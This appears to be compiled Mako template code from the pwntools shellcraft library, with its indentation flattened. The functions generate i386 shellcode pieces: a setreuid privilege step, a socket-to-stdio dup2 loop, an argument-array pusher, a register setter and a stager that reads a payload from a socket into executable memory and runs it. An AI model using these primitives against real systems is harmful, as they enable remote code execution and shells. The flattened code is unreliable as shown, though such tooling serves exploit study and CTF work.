def render_body(context, uid='euid', **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs, uid=uid)
__M_writer = context.writer()
from pwnlib.shellcraft import i386
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['i386']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(u'\n')
__M_writer(u'\n\n')
if uid == 'euid':
__M_writer(u' /* geteuid */\n ')
__M_writer(unicode(i386.linux.syscall('SYS_geteuid')))
__M_writer(u'\n ')
__M_writer(unicode(i386.mov('ebx', 'eax')))
__M_writer(u'\n')
else:
__M_writer(u' ')
__M_writer(unicode(i386.mov('ebx', uid)))
__M_writer(u'\n')
__M_writer(u'\n /* setreuid(eax, eax) */\n ')
__M_writer(unicode(i386.syscall('SYS_setreuid', 'ebx', 'ebx')))
__M_writer(u'\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_body(context, sock='ebp', **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs, sock=sock)
__M_writer = context.writer()
from pwnlib.shellcraft import i386
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['i386']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
from pwnlib.shellcraft import common
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['common']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(u'\n')
__M_writer(u'\n')
dup = common.label("dup")
looplabel = common.label("loop")
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['dup', 'looplabel']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n\n')
__M_writer(unicode(dup))
__M_writer(u':\n ')
__M_writer(unicode(i386.mov('ebx', sock)))
__M_writer(u'\n ')
__M_writer(unicode(i386.mov('ecx', 3)))
__M_writer(u'\n')
__M_writer(unicode(looplabel))
__M_writer(u':\n dec ecx\n\n ')
__M_writer(unicode(i386.linux.syscall('SYS_dup2', 'ebx', 'ecx')))
__M_writer(u'\n jnz ')
__M_writer(unicode(looplabel))
__M_writer(u'\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_body(context, return_value=None, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs,
return_value=return_value)
__M_writer = context.writer()
from pwnlib.shellcraft import i386
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['i386']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(u'\n')
__M_writer(u'\n\n')
if return_value != None:
__M_writer(u' ')
__M_writer(unicode(i386.mov('eax', return_value)))
__M_writer(u'\n')
__M_writer(u'\n ret\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_body(context, reg, array, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(array=array, reg=reg, pageargs=pageargs)
reversed = context.get('reversed', UNDEFINED)
repr = context.get('repr', UNDEFINED)
len = context.get('len', UNDEFINED)
str = context.get('str', UNDEFINED)
enumerate = context.get('enumerate', UNDEFINED)
isinstance = context.get('isinstance', UNDEFINED)
__M_writer = context.writer()
from pwnlib.shellcraft import i386
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['i386']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(u'\n')
__M_writer(u'\n')
if isinstance(array, (str)):
array = [array]
array_str = ''
# Normalize all of the arguments' endings
array = [arg.rstrip('\x00') + '\x00' for arg in array]
array_str = ''.join(array)
word_size = 4
offset = len(array_str) + word_size
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([
(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in
['word_size', 'array', 'offset', 'array_str', 'arg']
if __M_key in __M_locals_builtin_stored
]))
__M_writer(u' /* push argument array ')
__M_writer(unicode(repr(array)))
__M_writer(u' */\n ')
__M_writer(unicode(i386.pushstr(array_str)))
__M_writer(u'\n ')
__M_writer(unicode(i386.mov(reg, 0)))
__M_writer(u'\n push ')
__M_writer(unicode(reg))
__M_writer(u' /* null terminate */\n')
for i, arg in enumerate(reversed(array)):
__M_writer(u' ')
__M_writer(
unicode(i386.mov(reg, offset + word_size * i - len(arg))))
__M_writer(u'\n add ')
__M_writer(unicode(reg))
__M_writer(u', esp\n push ')
__M_writer(unicode(reg))
__M_writer(u' /* ')
__M_writer(unicode(repr(arg)))
__M_writer(u' */\n ')
offset -= len(arg)
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['offset']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u' ')
__M_writer(unicode(i386.mov(reg, 'esp')))
__M_writer(u'\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_body(context, sock, size, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs, sock=sock, size=size)
__M_writer = context.writer()
from pwnlib.shellcraft import common
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['common']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
from pwnlib.shellcraft import i386
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['i386']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
from pwnlib.shellcraft.i386 import linux
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['linux']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(u'\n')
__M_writer(u'\n\n')
stager = common.label("stager")
mmap = common.label("mmap")
looplabel = common.label("loop")
errlabel = common.label("error")
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([
(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['mmap', 'stager', 'looplabel', 'errlabel']
if __M_key in __M_locals_builtin_stored
]))
__M_writer(u'\n\n')
__M_writer(unicode(stager))
__M_writer(
u':\n/* old_mmap(NULL, size, PROT_EXEC|PROT_WRITE|PROT_READ, MAP_ANON|MAP_PRIVATE, -1) */\n push '
)
__M_writer(unicode(sock))
__M_writer(
u'\n xor eax, eax\n mov al, SYS_mmap\n xor ebx, ebx\n '
)
__M_writer(unicode(i386.mov("ecx", size)))
__M_writer(
u'\n push ecx\n xor edx, edx\n mov dl, PROT_EXEC|PROT_WRITE|PROT_READ\n push MAP_ANON|MAP_PRIVATE\n pop esi\n xor edi, edi\n dec edi\n int 0x80\n push eax\n\n pop ecx /* addr of mmaped buffer */\n pop edx /* size */\n pop ebx /* sock */\n push ecx /* save for: pop eax; call eax later */\n\n/* read/recv loop */\n'
)
__M_writer(unicode(looplabel))
__M_writer(
u':\n xor eax, eax\n mov al, SYS_read\n int 0x80\n test eax, eax\n js '
)
__M_writer(unicode(errlabel))
__M_writer(
u'\n sub edx, eax\n add ecx, eax\n test edx, edx\n jne '
)
__M_writer(unicode(looplabel))
__M_writer(
u'\n\n pop eax /* start of mmaped buffer */\n push ebx /* sock */\n call eax /* jump and hope for it to work */\n\n'
)
__M_writer(unicode(errlabel))
__M_writer(u':\n hlt\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_body(context, reg_context, stack_allowed=True, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(reg_context=reg_context,
pageargs=pageargs,
stack_allowed=stack_allowed)
int = context.get('int', UNDEFINED)
NameError = context.get('NameError', UNDEFINED)
isinstance = context.get('isinstance', UNDEFINED)
str = context.get('str', UNDEFINED)
__M_writer = context.writer()
from pwnlib.regsort import regsort
from pwnlib.constants import Constant, eval
from pwnlib.shellcraft import registers
from pwnlib.shellcraft.i386 import mov
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([
(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in
['regsort', 'registers', 'Constant', 'mov', 'eval']
if __M_key in __M_locals_builtin_stored
]))
__M_writer(u'\n')
__M_writer(u'\n')
__M_writer(u'\n')
reg_context = {k: v for k, v in reg_context.items() if v is not None}
eax = reg_context.get('eax', None)
edx = reg_context.get('edx', None)
cdq = False
if isinstance(eax, str):
try:
eax = eval(eax)
except NameError:
pass
if isinstance(edx, str):
try:
edx = eval(edx)
except NameError:
pass
if isinstance(eax, int) and isinstance(edx, int) and eax >> 31 == edx:
cdq = True
reg_context.pop('edx')
sorted_regs = regsort(reg_context, registers.i386)
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([
(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in
['reg_context', 'k', 'eax', 'cdq', 'v', 'edx', 'sorted_regs']
if __M_key in __M_locals_builtin_stored
]))
__M_writer(u'\n')
if not sorted_regs:
__M_writer(u' /* setregs noop */\n')
else:
for how, src, dst in regsort(reg_context, registers.i386):
if how == 'xchg':
__M_writer(u' xchg ')
__M_writer(unicode(src))
__M_writer(u', ')
__M_writer(unicode(dst))
__M_writer(u'\n')
else:
__M_writer(u' ')
__M_writer(unicode(mov(src, dst)))
__M_writer(u'\n')
if cdq:
__M_writer(u' cdq /* edx=0 */\n')
return ''
finally:
context.caller_stack._pop_frame()
